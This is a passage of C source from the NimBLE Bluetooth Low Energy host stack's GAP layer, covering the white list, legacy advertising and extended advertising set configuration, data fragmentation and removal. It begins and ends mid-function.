ble_gap_update_next_exp(&ticks_until_exp); if (ticks_until_exp == 0) { entry = ble_gap_update_entry_remove(conn_handle); } else { entry = NULL; } ble_hs_unlock(); if (entry != NULL) { ble_gap_update_entry_free(entry); } } while (entry != NULL); return ticks_until_exp; } int ble_gap_set_event_cb(uint16_t conn_handle, ble_gap_event_fn *cb, void *cb_arg) { struct ble_hs_conn *conn; ble_hs_lock(); conn = ble_hs_conn_find(conn_handle); if (conn != NULL) { conn->bhc_cb = cb; conn->bhc_cb_arg = cb_arg; } ble_hs_unlock(); if (conn == NULL) { return BLE_HS_ENOTCONN; } return 0; } /** * Handles timed-out GAP procedures. * * @return The number of ticks until this function should * be called again. */ int32_t ble_gap_timer(void) { int32_t update_ticks; int32_t master_ticks; int32_t min_ticks; master_ticks = ble_gap_master_timer(); update_ticks = ble_gap_update_timer(); min_ticks = min(master_ticks, update_ticks); #if !MYNEWT_VAL(BLE_EXT_ADV) min_ticks = min(min_ticks, ble_gap_slave_timer()); #endif return min_ticks; } /***************************************************************************** * $white list * *****************************************************************************/ #if MYNEWT_VAL(BLE_WHITELIST) static int ble_gap_wl_busy(void) { /* Check if an auto or selective connection establishment procedure is in * progress. 
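 * i.e. a connect initiated with the white list as the initiator filter
 * policy (conn.using_wl); the list must not be rewritten while such a
 * procedure is running.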
*/ return ble_gap_master.op == BLE_GAP_OP_M_CONN && ble_gap_master.conn.using_wl; } static int ble_gap_wl_tx_add(const ble_addr_t *addr) { struct ble_hci_le_add_whte_list_cp cmd; if (addr->type > BLE_ADDR_RANDOM) { return BLE_HS_EINVAL; } memcpy(cmd.addr, addr->val, BLE_DEV_ADDR_LEN); cmd.addr_type = addr->type; return ble_hs_hci_cmd_tx(BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_ADD_WHITE_LIST), &cmd, sizeof(cmd), NULL, 0); } static int ble_gap_wl_tx_clear(void) { return ble_hs_hci_cmd_tx(BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_CLEAR_WHITE_LIST), NULL, 0, NULL, 0 ); } #endif int ble_gap_wl_set(const ble_addr_t *addrs, uint8_t white_list_count) { #if MYNEWT_VAL(BLE_WHITELIST) int rc; int i; STATS_INC(ble_gap_stats, wl_set); ble_hs_lock(); if (white_list_count == 0) { rc = BLE_HS_EINVAL; goto done; } for (i = 0; i < white_list_count; i++) { if (addrs[i].type != BLE_ADDR_PUBLIC && addrs[i].type != BLE_ADDR_RANDOM) { rc = BLE_HS_EINVAL; goto done; } } if (ble_gap_wl_busy()) { rc = BLE_HS_EBUSY; goto done; } BLE_HS_LOG(INFO, "GAP procedure initiated: set whitelist; "); ble_gap_log_wl(addrs, white_list_count); BLE_HS_LOG(INFO, "\n"); rc = ble_gap_wl_tx_clear(); if (rc != 0) { goto done; } for (i = 0; i < white_list_count; i++) { rc = ble_gap_wl_tx_add(addrs + i); if (rc != 0) { goto done; } } rc = 0; done: ble_hs_unlock(); if (rc != 0) { STATS_INC(ble_gap_stats, wl_set_fail); } return rc; #else return BLE_HS_ENOTSUP; #endif } /***************************************************************************** * $stop advertise * *****************************************************************************/ #if NIMBLE_BLE_ADVERTISE && !MYNEWT_VAL(BLE_EXT_ADV) static int ble_gap_adv_enable_tx(int enable) { struct ble_hci_le_set_adv_enable_cp cmd; cmd.enable = !!enable; return ble_hs_hci_cmd_tx(BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_SET_ADV_ENABLE), &cmd, sizeof(cmd), NULL, 0); } static int ble_gap_adv_stop_no_lock(void) { bool active; int rc; BLE_HS_DBG_ASSERT(ble_hs_locked_by_cur_task()); STATS_INC(ble_gap_stats, adv_stop); active = ble_gap_adv_active(); BLE_HS_LOG(INFO, "GAP procedure initiated: stop advertising.\n"); rc = ble_gap_adv_enable_tx(0); if (rc != 0) { goto done; } ble_gap_slave_reset_state(0); if (!active) { rc = BLE_HS_EALREADY; } else { rc = 0; } done: if (rc != 0) { STATS_INC(ble_gap_stats, adv_stop_fail); } return rc; } #endif int ble_gap_adv_stop(void) { #if NIMBLE_BLE_ADVERTISE && !MYNEWT_VAL(BLE_EXT_ADV) int rc; ble_hs_lock(); rc = ble_gap_adv_stop_no_lock(); ble_hs_unlock(); return rc; #else return BLE_HS_ENOTSUP; #endif } /***************************************************************************** * $advertise * *****************************************************************************/ #if NIMBLE_BLE_ADVERTISE && !MYNEWT_VAL(BLE_EXT_ADV) static int ble_gap_adv_type(const struct ble_gap_adv_params *adv_params) { switch (adv_params->conn_mode) { case BLE_GAP_CONN_MODE_NON: if (adv_params->disc_mode == BLE_GAP_DISC_MODE_NON) { return BLE_HCI_ADV_TYPE_ADV_NONCONN_IND; } else { return BLE_HCI_ADV_TYPE_ADV_SCAN_IND; } case BLE_GAP_CONN_MODE_UND: return BLE_HCI_ADV_TYPE_ADV_IND; case BLE_GAP_CONN_MODE_DIR: if (adv_params->high_duty_cycle) { return BLE_HCI_ADV_TYPE_ADV_DIRECT_IND_HD; } else { return BLE_HCI_ADV_TYPE_ADV_DIRECT_IND_LD; } default: BLE_HS_DBG_ASSERT(0); return BLE_HCI_ADV_TYPE_ADV_IND; } } static void ble_gap_adv_dflt_itvls(uint8_t conn_mode, uint16_t *out_itvl_min, uint16_t *out_itvl_max) { switch (conn_mode) { case BLE_GAP_CONN_MODE_NON: *out_itvl_min = 
BLE_GAP_ADV_FAST_INTERVAL2_MIN; *out_itvl_max = BLE_GAP_ADV_FAST_INTERVAL2_MAX; break; case BLE_GAP_CONN_MODE_UND: *out_itvl_min = BLE_GAP_ADV_FAST_INTERVAL1_MIN; *out_itvl_max = BLE_GAP_ADV_FAST_INTERVAL1_MAX; break; case BLE_GAP_CONN_MODE_DIR: *out_itvl_min = BLE_GAP_ADV_FAST_INTERVAL1_MIN; *out_itvl_max = BLE_GAP_ADV_FAST_INTERVAL1_MAX; break; default: BLE_HS_DBG_ASSERT(0); *out_itvl_min = BLE_GAP_ADV_FAST_INTERVAL1_MIN; *out_itvl_max = BLE_GAP_ADV_FAST_INTERVAL1_MAX; break; } } static int ble_gap_adv_params_tx(uint8_t own_addr_type, const ble_addr_t *peer_addr, const struct ble_gap_adv_params *adv_params) { const ble_addr_t *peer_any = BLE_ADDR_ANY; struct ble_hci_le_set_adv_params_cp cmd; uint16_t opcode; uint16_t min; uint16_t max; /* Fill optional fields if application did not specify them. */ if ((adv_params->itvl_min == 0) && (adv_params->itvl_max == 0)) { ble_gap_adv_dflt_itvls(adv_params->conn_mode, &min, &max); cmd.min_interval = htole16(min); cmd.max_interval = htole16(max); } else { cmd.min_interval = htole16(adv_params->itvl_min); cmd.max_interval = htole16(adv_params->itvl_max); } cmd.type = ble_gap_adv_type(adv_params); cmd.own_addr_type = own_addr_type; if (peer_addr == NULL) { peer_addr = peer_any; } cmd.peer_addr_type = peer_addr->type; memcpy(&cmd.peer_addr, peer_addr->val, sizeof(cmd.peer_addr)); if (adv_params->channel_map == 0) { cmd.chan_map = BLE_GAP_ADV_DFLT_CHANNEL_MAP; } else { cmd.chan_map = adv_params->channel_map; } /* Zero is the default value for filter policy and high duty cycle */ cmd.filter_policy = adv_params->filter_policy; opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_SET_ADV_PARAMS); return ble_hs_hci_cmd_tx(opcode, &cmd, sizeof(cmd), NULL, 0); } static int ble_gap_adv_validate(uint8_t own_addr_type, const ble_addr_t *peer_addr, const struct ble_gap_adv_params *adv_params) { if (adv_params == NULL) { return BLE_HS_EINVAL; } if (own_addr_type > BLE_HCI_ADV_OWN_ADDR_MAX) { return BLE_HS_EINVAL; } if (adv_params->disc_mode >= BLE_GAP_DISC_MODE_MAX) { return BLE_HS_EINVAL; } if (ble_gap_slave[0].op != BLE_GAP_OP_NULL) { return BLE_HS_EALREADY; } switch (adv_params->conn_mode) { case BLE_GAP_CONN_MODE_NON: /* High duty cycle only allowed for directed advertising. */ if (adv_params->high_duty_cycle) { return BLE_HS_EINVAL; } break; case BLE_GAP_CONN_MODE_UND: /* High duty cycle only allowed for directed advertising. */ if (adv_params->high_duty_cycle) { return BLE_HS_EINVAL; } /* Don't allow connectable advertising if we won't be able to allocate * a new connection. */ if (!ble_hs_conn_can_alloc()) { return BLE_HS_ENOMEM; } break; case BLE_GAP_CONN_MODE_DIR: if (peer_addr == NULL) { return BLE_HS_EINVAL; } if (peer_addr->type != BLE_ADDR_PUBLIC && peer_addr->type != BLE_ADDR_RANDOM && peer_addr->type != BLE_ADDR_PUBLIC_ID && peer_addr->type != BLE_ADDR_RANDOM_ID) { return BLE_HS_EINVAL; } /* Don't allow connectable advertising if we won't be able to allocate * a new connection. 
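     * (ble_hs_conn_can_alloc() reflects whether a free connection object is
     * available; the pool is typically sized by the BLE_MAX_CONNECTIONS
     * syscfg value.)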
*/ if (!ble_hs_conn_can_alloc()) { return BLE_HS_ENOMEM; } break; default: return BLE_HS_EINVAL; } return 0; } #endif int ble_gap_adv_start(uint8_t own_addr_type, const ble_addr_t *direct_addr, int32_t duration_ms, const struct ble_gap_adv_params *adv_params, ble_gap_event_fn *cb, void *cb_arg) { #if NIMBLE_BLE_ADVERTISE && !MYNEWT_VAL(BLE_EXT_ADV) uint32_t duration_ticks; int rc; STATS_INC(ble_gap_stats, adv_start); ble_hs_lock(); rc = ble_gap_adv_validate(own_addr_type, direct_addr, adv_params); if (rc != 0) { goto done; } if (duration_ms != BLE_HS_FOREVER) { rc = ble_npl_time_ms_to_ticks(duration_ms, &duration_ticks); if (rc != 0) { /* Duration too great. */ rc = BLE_HS_EINVAL; goto done; } } if (!ble_hs_is_enabled()) { rc = BLE_HS_EDISABLED; goto done; } if (ble_gap_is_preempted()) { rc = BLE_HS_EPREEMPTED; goto done; } rc = ble_hs_id_use_addr(own_addr_type); if (rc != 0) { goto done; } BLE_HS_LOG(INFO, "GAP procedure initiated: advertise; "); ble_gap_log_adv(own_addr_type, direct_addr, adv_params); BLE_HS_LOG(INFO, "\n"); ble_gap_slave[0].cb = cb; ble_gap_slave[0].cb_arg = cb_arg; ble_gap_slave[0].our_addr_type = own_addr_type; if (adv_params->conn_mode != BLE_GAP_CONN_MODE_NON) { ble_gap_slave[0].connectable = 1; } else { ble_gap_slave[0].connectable = 0; } rc = ble_gap_adv_params_tx(own_addr_type, direct_addr, adv_params); if (rc != 0) { goto done; } ble_gap_slave[0].op = BLE_GAP_OP_S_ADV; rc = ble_gap_adv_enable_tx(1); if (rc != 0) { ble_gap_slave_reset_state(0); goto done; } if (duration_ms != BLE_HS_FOREVER) { ble_gap_slave_set_timer(duration_ticks); } rc = 0; done: ble_hs_unlock(); if (rc != 0) { STATS_INC(ble_gap_stats, adv_start_fail); } return rc; #else return BLE_HS_ENOTSUP; #endif } int ble_gap_adv_set_data(const uint8_t *data, int data_len) { #if NIMBLE_BLE_ADVERTISE && !MYNEWT_VAL(BLE_EXT_ADV) struct ble_hci_le_set_adv_data_cp cmd; uint16_t opcode; STATS_INC(ble_gap_stats, adv_set_data); /* Check for valid parameters */ if (((data == NULL) && (data_len != 0)) || (data_len > BLE_HCI_MAX_ADV_DATA_LEN)) { return BLE_ERR_INV_HCI_CMD_PARMS; } memcpy(cmd.adv_data, data, data_len); cmd.adv_data_len = data_len; opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_SET_ADV_DATA); return ble_hs_hci_cmd_tx(opcode, &cmd, sizeof(cmd), NULL, 0); #else return BLE_HS_ENOTSUP; #endif } int ble_gap_adv_rsp_set_data(const uint8_t *data, int data_len) { #if NIMBLE_BLE_ADVERTISE && !MYNEWT_VAL(BLE_EXT_ADV) struct ble_hci_le_set_scan_rsp_data_cp cmd; uint16_t opcode; /* Check for valid parameters */ if (((data == NULL) && (data_len != 0)) || (data_len > BLE_HCI_MAX_SCAN_RSP_DATA_LEN)) { return BLE_HS_EINVAL; } memcpy(cmd.scan_rsp, data, data_len); cmd.scan_rsp_len = data_len; opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_SET_SCAN_RSP_DATA); return ble_hs_hci_cmd_tx(opcode, &cmd, sizeof(cmd), NULL, 0); #else return BLE_HS_ENOTSUP; #endif } int ble_gap_adv_set_fields(const struct ble_hs_adv_fields *adv_fields) { #if NIMBLE_BLE_ADVERTISE && !MYNEWT_VAL(BLE_EXT_ADV) uint8_t buf[BLE_HS_ADV_MAX_SZ]; uint8_t buf_sz; int rc; rc = ble_hs_adv_set_fields(adv_fields, buf, &buf_sz, sizeof buf); if (rc != 0) { return rc; } rc = ble_gap_adv_set_data(buf, buf_sz); if (rc != 0) { return rc; } return 0; #else return BLE_HS_ENOTSUP; #endif } int ble_gap_adv_rsp_set_fields(const struct ble_hs_adv_fields *rsp_fields) { #if NIMBLE_BLE_ADVERTISE && !MYNEWT_VAL(BLE_EXT_ADV) uint8_t buf[BLE_HS_ADV_MAX_SZ]; uint8_t buf_sz; int rc; rc = ble_hs_adv_set_fields(rsp_fields, buf, &buf_sz, sizeof buf); if (rc != 0) { return 
rc; } rc = ble_gap_adv_rsp_set_data(buf, buf_sz); if (rc != 0) { return rc; } return 0; #else return BLE_HS_ENOTSUP; #endif } int ble_gap_adv_active(void) { return ble_gap_adv_active_instance(0); } #if MYNEWT_VAL(BLE_EXT_ADV) static int ble_gap_ext_adv_params_tx(uint8_t instance, const struct ble_gap_ext_adv_params *params, int8_t *selected_tx_power) { struct ble_hci_le_set_ext_adv_params_cp cmd; struct ble_hci_le_set_ext_adv_params_rp rsp; int rc; memset(&cmd, 0, sizeof(cmd)); cmd.adv_handle = instance; if (params->connectable) { cmd.props |= BLE_HCI_LE_SET_EXT_ADV_PROP_CONNECTABLE; } if (params->scannable) { cmd.props |= BLE_HCI_LE_SET_EXT_ADV_PROP_SCANNABLE; } if (params->directed) { cmd.props |= BLE_HCI_LE_SET_EXT_ADV_PROP_DIRECTED; cmd.peer_addr_type = params->peer.type; memcpy(cmd.peer_addr, params->peer.val, BLE_DEV_ADDR_LEN); } if (params->high_duty_directed) { cmd.props |= BLE_HCI_LE_SET_EXT_ADV_PROP_HD_DIRECTED; } if (params->legacy_pdu) { cmd.props |= BLE_HCI_LE_SET_EXT_ADV_PROP_LEGACY; } if (params->anonymous) { cmd.props |= BLE_HCI_LE_SET_EXT_ADV_PROP_ANON_ADV; } if (params->include_tx_power) { cmd.props |= BLE_HCI_LE_SET_EXT_ADV_PROP_INC_TX_PWR; } /* Fill optional fields if application did not specify them. */ if (params->itvl_min == 0 && params->itvl_max == 0) { /* TODO for now limited to legacy values*/ put_le24(cmd.pri_itvl_min, BLE_GAP_ADV_FAST_INTERVAL1_MIN); put_le24(cmd.pri_itvl_max, BLE_GAP_ADV_FAST_INTERVAL2_MAX); } else { put_le24(cmd.pri_itvl_min, params->itvl_min); put_le24(cmd.pri_itvl_max, params->itvl_max); } if (params->channel_map == 0) { cmd.pri_chan_map = BLE_GAP_ADV_DFLT_CHANNEL_MAP; } else { cmd.pri_chan_map = params->channel_map; } /* Zero is the default value for filter policy and high duty cycle */ cmd.filter_policy = params->filter_policy; cmd.tx_power = params->tx_power; if (params->legacy_pdu) { cmd.pri_phy = BLE_HCI_LE_PHY_1M; cmd.sec_phy = BLE_HCI_LE_PHY_1M; } else { cmd.pri_phy = params->primary_phy; cmd.sec_phy = params->secondary_phy; } cmd.own_addr_type = params->own_addr_type; cmd.sec_max_skip = 0; cmd.sid = params->sid; cmd.scan_req_notif = params->scan_req_notif; rc = ble_hs_hci_cmd_tx(BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_SET_EXT_ADV_PARAM), &cmd, sizeof(cmd), &rsp, sizeof(rsp)); if (rc != 0) { return rc; } if (selected_tx_power) { *selected_tx_power = rsp.tx_power; } return 0; } static int ble_gap_ext_adv_params_validate(const struct ble_gap_ext_adv_params *params) { if (!params) { return BLE_HS_EINVAL; } if (params->own_addr_type > BLE_HCI_ADV_OWN_ADDR_MAX) { return BLE_HS_EINVAL; } /* Don't allow connectable advertising if we won't be able to allocate * a new connection. 
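     * (Same restriction as in the legacy path; see ble_gap_adv_validate()
     * above.)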
     */
    if (params->connectable && !ble_hs_conn_can_alloc()) {
        return BLE_HS_ENOMEM;
    }

    if (params->legacy_pdu) {
        /* not allowed for legacy PDUs */
        if (params->anonymous || params->include_tx_power) {
            return BLE_HS_EINVAL;
        }
    }

    if (params->directed) {
        if (params->scannable && params->connectable) {
            return BLE_HS_EINVAL;
        }
    }

    if (!params->legacy_pdu) {
        /* not allowed for extended advertising PDUs */
        if (params->connectable && params->scannable) {
            return BLE_HS_EINVAL;
        }

        /* HD directed advertising allowed only for legacy PDUs */
        if (params->high_duty_directed) {
            return BLE_HS_EINVAL;
        }
    }

    return 0;
}

int
ble_gap_ext_adv_configure(uint8_t instance,
                          const struct ble_gap_ext_adv_params *params,
                          int8_t *selected_tx_power,
                          ble_gap_event_fn *cb, void *cb_arg)
{
    int rc;

    if (instance >= BLE_ADV_INSTANCES) {
        return BLE_HS_EINVAL;
    }

    rc = ble_gap_ext_adv_params_validate(params);
    if (rc) {
        return rc;
    }

    ble_hs_lock();

    if (ble_gap_adv_active_instance(instance)) {
        ble_hs_unlock();
        return BLE_HS_EBUSY;
    }

    rc = ble_gap_ext_adv_params_tx(instance, params, selected_tx_power);
    if (rc) {
        ble_hs_unlock();
        return rc;
    }

    ble_gap_slave[instance].configured = 1;
    ble_gap_slave[instance].cb = cb;
    ble_gap_slave[instance].cb_arg = cb_arg;
    ble_gap_slave[instance].our_addr_type = params->own_addr_type;

    ble_gap_slave[instance].connectable = params->connectable;
    ble_gap_slave[instance].scannable = params->scannable;
    ble_gap_slave[instance].directed = params->directed;
    ble_gap_slave[instance].high_duty_directed = params->high_duty_directed;
    ble_gap_slave[instance].legacy_pdu = params->legacy_pdu;

    ble_hs_unlock();
    return 0;
}

static int
ble_gap_ext_adv_set_addr_no_lock(uint8_t instance, const uint8_t *addr)
{
    struct ble_hci_le_set_adv_set_rnd_addr_cp cmd;
    int rc;

    cmd.adv_handle = instance;
    memcpy(cmd.addr, addr, BLE_DEV_ADDR_LEN);

    rc = ble_hs_hci_cmd_tx(BLE_HCI_OP(BLE_HCI_OGF_LE,
                                      BLE_HCI_OCF_LE_SET_ADV_SET_RND_ADDR),
                           &cmd, sizeof(cmd), NULL, 0);
    if (rc != 0) {
        return rc;
    }

    ble_gap_slave[instance].rnd_addr_set = 1;
    memcpy(ble_gap_slave[instance].rnd_addr, addr, 6);

    return 0;
}

int
ble_gap_ext_adv_set_addr(uint8_t instance, const ble_addr_t *addr)
{
    int rc;

    if (instance >= BLE_ADV_INSTANCES || addr->type != BLE_ADDR_RANDOM) {
        return BLE_HS_EINVAL;
    }

    ble_hs_lock();
    rc = ble_gap_ext_adv_set_addr_no_lock(instance, addr->val);
    ble_hs_unlock();

    return rc;
}

int
ble_gap_ext_adv_start(uint8_t instance, int duration, int max_events)
{
    struct ble_hci_le_set_ext_adv_enable_cp *cmd;
    uint8_t buf[sizeof(*cmd) + sizeof(cmd->sets[0])];
    const uint8_t *rnd_addr;
    uint16_t opcode;
    int rc;

    if (instance >= BLE_ADV_INSTANCES) {
        return BLE_HS_EINVAL;
    }

    ble_hs_lock();
    if (!ble_gap_slave[instance].configured) {
        ble_hs_unlock();
        return BLE_HS_EINVAL;
    }

    if (ble_gap_slave[instance].op != BLE_GAP_OP_NULL) {
        ble_hs_unlock();
        return BLE_HS_EALREADY;
    }

    /* HD directed advertising duration shall not be 0, nor larger than
     * 1.28 s (128 * 10 ms units).
     */
    if (ble_gap_slave[instance].high_duty_directed &&
        ((duration == 0) || (duration > 128))) {
        ble_hs_unlock();
        return BLE_HS_EINVAL;
    }

    /* verify own address type if random address for instance wasn't explicitly
     * set
     */
    switch (ble_gap_slave[instance].our_addr_type) {
    case BLE_OWN_ADDR_RANDOM:
    case BLE_OWN_ADDR_RPA_RANDOM_DEFAULT:
        if (ble_gap_slave[instance].rnd_addr_set) {
            break;
        }
        /* fall through */
    case BLE_OWN_ADDR_PUBLIC:
    case BLE_OWN_ADDR_RPA_PUBLIC_DEFAULT:
    default:
        rc = ble_hs_id_use_addr(ble_gap_slave[instance].our_addr_type);
        if (rc) {
            ble_hs_unlock();
            return BLE_HS_EINVAL;
        }
        break;
    }

    /* fallback to ID static random address if using random address and
instance * wasn't configured with own address */ if (!ble_gap_slave[instance].rnd_addr_set) { switch (ble_gap_slave[instance].our_addr_type) { case BLE_OWN_ADDR_RANDOM: case BLE_OWN_ADDR_RPA_RANDOM_DEFAULT: rc = ble_hs_id_addr(BLE_ADDR_RANDOM, &rnd_addr, NULL); if (rc != 0) { ble_hs_unlock(); return rc; } rc = ble_gap_ext_adv_set_addr_no_lock(instance, rnd_addr); if (rc != 0) { ble_hs_unlock(); return rc; } break; default: break; } } opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_SET_EXT_ADV_ENABLE); cmd = (void *) buf; cmd->enable = 0x01; cmd->num_sets = 1; cmd->sets[0].adv_handle = instance; cmd->sets[0].duration = htole16(duration); cmd->sets[0].max_events = max_events; rc = ble_hs_hci_cmd_tx(opcode, cmd, sizeof(buf), NULL, 0); if (rc != 0) { ble_hs_unlock(); return rc; } ble_gap_slave[instance].op = BLE_GAP_OP_S_ADV; ble_hs_unlock(); return 0; } static int ble_gap_ext_adv_stop_no_lock(uint8_t instance) { struct ble_hci_le_set_ext_adv_enable_cp *cmd; uint8_t buf[sizeof(*cmd) + sizeof(cmd->sets[0])]; uint16_t opcode; bool active; int rc; if (!ble_gap_slave[instance].configured) { return BLE_HS_EINVAL; } active = ble_gap_adv_active_instance(instance); cmd = (void *) buf; cmd->enable = 0x00; cmd->num_sets = 1; cmd->sets[0].adv_handle = instance; cmd->sets[0].duration = 0x0000; cmd->sets[0].max_events = 0x00; opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_SET_EXT_ADV_ENABLE); rc = ble_hs_hci_cmd_tx(opcode, cmd, sizeof(buf), NULL, 0); if (rc != 0) { return rc; } ble_gap_slave[instance].op = BLE_GAP_OP_NULL; if (!active) { return BLE_HS_EALREADY; } else { return 0; } } int ble_gap_ext_adv_stop(uint8_t instance) { int rc; if (instance >= BLE_ADV_INSTANCES) { return BLE_HS_EINVAL; } ble_hs_lock(); rc = ble_gap_ext_adv_stop_no_lock(instance); ble_hs_unlock(); return rc; } static int ble_gap_ext_adv_set_data_validate(uint8_t instance, struct os_mbuf *data) { uint16_t len = OS_MBUF_PKTLEN(data); if (!ble_gap_slave[instance].configured) { return BLE_HS_EINVAL; } /* not allowed with directed advertising for legacy*/ if (ble_gap_slave[instance].legacy_pdu && ble_gap_slave[instance].directed) { return BLE_HS_EINVAL; } /* always allowed with legacy PDU but limited to legacy length */ if (ble_gap_slave[instance].legacy_pdu) { if (len > BLE_HS_ADV_MAX_SZ) { return BLE_HS_EINVAL; } return 0; } /* if already advertising, data must fit in single HCI command * as per BT 5.0 Vol 2, Part E, 7.8.54. Don't bother Controller with such * a request. 
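     * In practice this means at most min(MYNEWT_VAL(BLE_EXT_ADV_MAX_SIZE),
     * 251) bytes, as enforced below.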
*/ if (ble_gap_slave[instance].op == BLE_GAP_OP_S_ADV) { if (len > min(MYNEWT_VAL(BLE_EXT_ADV_MAX_SIZE), 251)) { return BLE_HS_EINVAL; } } /* not allowed with scannable advertising */ if (ble_gap_slave[instance].scannable) { return BLE_HS_EINVAL; } return 0; } static int ble_gap_ext_adv_set(uint8_t instance, uint16_t opcode, struct os_mbuf **data) { /* in that case we always fit all data in single HCI command */ #if MYNEWT_VAL(BLE_EXT_ADV_MAX_SIZE) <= BLE_HCI_MAX_EXT_ADV_DATA_LEN static uint8_t buf[sizeof(struct ble_hci_le_set_ext_adv_data_cp) + \ MYNEWT_VAL(BLE_EXT_ADV_MAX_SIZE)]; struct ble_hci_le_set_ext_adv_data_cp *cmd = (void *)buf; uint16_t len = OS_MBUF_PKTLEN(*data); opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, opcode); cmd->adv_handle = instance; cmd->operation = BLE_HCI_LE_SET_DATA_OPER_COMPLETE; cmd->fragment_pref = 0; cmd->adv_data_len = len; os_mbuf_copydata(*data, 0, len, cmd->adv_data); os_mbuf_adj(*data, len); *data = os_mbuf_trim_front(*data); return ble_hs_hci_cmd_tx(opcode, cmd, sizeof(*cmd) + cmd->adv_data_len, NULL, 0); #else static uint8_t buf[sizeof(struct ble_hci_le_set_ext_adv_data_cp) + \ BLE_HCI_MAX_EXT_ADV_DATA_LEN]; struct ble_hci_le_set_ext_adv_data_cp *cmd = (void *)buf; uint16_t len = OS_MBUF_PKTLEN(*data); uint8_t op; int rc; opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, opcode); cmd->adv_handle = instance; /* complete data */ if (len <= BLE_HCI_MAX_EXT_ADV_DATA_LEN) { cmd->operation = BLE_HCI_LE_SET_DATA_OPER_COMPLETE; cmd->fragment_pref = 0; cmd->adv_data_len = len; os_mbuf_copydata(*data, 0, len, cmd->adv_data); os_mbuf_adj(*data, len); *data = os_mbuf_trim_front(*data); return ble_hs_hci_cmd_tx(opcode, cmd, sizeof(*cmd) + cmd->adv_data_len, NULL, 0); } /* first fragment */ op = BLE_HCI_LE_SET_DATA_OPER_FIRST; do { cmd->operation = op; cmd->fragment_pref = 0; cmd->adv_data_len = BLE_HCI_MAX_EXT_ADV_DATA_LEN; os_mbuf_copydata(*data, 0, BLE_HCI_MAX_EXT_ADV_DATA_LEN, cmd->adv_data); os_mbuf_adj(*data, BLE_HCI_MAX_EXT_ADV_DATA_LEN); *data = os_mbuf_trim_front(*data); rc = ble_hs_hci_cmd_tx(opcode, cmd, sizeof(*cmd) + cmd->adv_data_len, NULL, 0); if (rc) { return rc; } len -= BLE_HCI_MAX_EXT_ADV_DATA_LEN; op = BLE_HCI_LE_SET_DATA_OPER_INT; } while (len > BLE_HCI_MAX_EXT_ADV_DATA_LEN); /* last fragment */ cmd->operation = BLE_HCI_LE_SET_DATA_OPER_LAST; cmd->fragment_pref = 0; cmd->adv_data_len = len; os_mbuf_copydata(*data, 0, len, cmd->adv_data); os_mbuf_adj(*data, len); *data = os_mbuf_trim_front(*data); return ble_hs_hci_cmd_tx(opcode, cmd, sizeof(*cmd) + cmd->adv_data_len, NULL, 0); #endif } int ble_gap_ext_adv_set_data(uint8_t instance, struct os_mbuf *data) { int rc; if (instance >= BLE_ADV_INSTANCES) { rc = BLE_HS_EINVAL; goto done; } ble_hs_lock(); rc = ble_gap_ext_adv_set_data_validate(instance, data); if (rc != 0) { ble_hs_unlock(); goto done; } rc = ble_gap_ext_adv_set(instance, BLE_HCI_OCF_LE_SET_EXT_ADV_DATA, &data); ble_hs_unlock(); done: os_mbuf_free_chain(data); return rc; } static int ble_gap_ext_adv_rsp_set_validate(uint8_t instance, struct os_mbuf *data) { uint16_t len = OS_MBUF_PKTLEN(data); if (!ble_gap_slave[instance].configured) { return BLE_HS_EINVAL; } /* not allowed with directed advertising */ if (ble_gap_slave[instance].directed && ble_gap_slave[instance].connectable) { return BLE_HS_EINVAL; } /* only allowed with scannable advertising */ if (!ble_gap_slave[instance].scannable) { return BLE_HS_EINVAL; } /* with legacy PDU limited to legacy length */ if (ble_gap_slave[instance].legacy_pdu) { if (len > BLE_HS_ADV_MAX_SZ) { return BLE_HS_EINVAL; } 
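        /* Legacy scan response data fits; BLE_HS_ADV_MAX_SZ is the 31-byte
         * legacy limit. */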
        return 0;
    }

    /* if already advertising, data must fit in single HCI command
     * as per BT 5.0 Vol 2, Part E, 7.8.55. Don't bother Controller with such
     * a request.
     */
    if (ble_gap_slave[instance].op == BLE_GAP_OP_S_ADV) {
        if (len > min(MYNEWT_VAL(BLE_EXT_ADV_MAX_SIZE), 251)) {
            return BLE_HS_EINVAL;
        }
    }

    return 0;
}

int
ble_gap_ext_adv_rsp_set_data(uint8_t instance, struct os_mbuf *data)
{
    int rc;

    if (instance >= BLE_ADV_INSTANCES) {
        rc = BLE_HS_EINVAL;
        goto done;
    }

    ble_hs_lock();
    rc = ble_gap_ext_adv_rsp_set_validate(instance, data);
    if (rc != 0) {
        ble_hs_unlock();
        goto done;
    }

    rc = ble_gap_ext_adv_set(instance, BLE_HCI_OCF_LE_SET_EXT_SCAN_RSP_DATA,
                             &data);
    ble_hs_unlock();

done:
    os_mbuf_free_chain(data);
    return rc;
}

int
ble_gap_ext_adv_remove(uint8_t instance)
{
    struct ble_hci_le_remove_adv_set_cp cmd;
    uint16_t opcode;
    int rc;

    if (instance >= BLE_ADV_INSTANCES) {
        return BLE_HS_EINVAL;
    }

    ble_hs_lock();
    if (!ble_gap_slave[instance].configured) {
        ble_hs_unlock();
        return BLE_HS_EALREADY;
    }

    if (ble_gap_slave[instance].op == BLE_GAP_OP_S_ADV) {
        ble_hs_unlock();
        return BLE_HS_EBUSY;
    }

    cmd.adv_handle = instance;
    opcode = BLE_HCI_OP(BLE_HCI_OGF_LE, BLE_HCI_OCF_LE_REMOVE_ADV_SET);

    rc = ble_hs_hci_cmd_tx(opcode, &cmd, sizeof(cmd), NULL, 0);
    if (rc != 0) {
        ble_hs_unlock();
        return rc;
    }

    memset(&ble_gap_slave[instance], 0, sizeof(struct ble_gap_slave_state));
    ble_hs_unlock();

    return 0;
}

int
ble_gap_ext_adv_clear(void)
{
    int rc;
    uint8_t instance;
    uint16_t opcode;

    ble_hs_lock();

    for (instance = 0; instance < BLE_ADV_INSTANCES; instance++) {
        /* If there is an active instance or periodic adv instance,
         * don't send the command.
         */
        if (ble_gap_slave[instance].op == BLE_GAP_OP_S_ADV) {
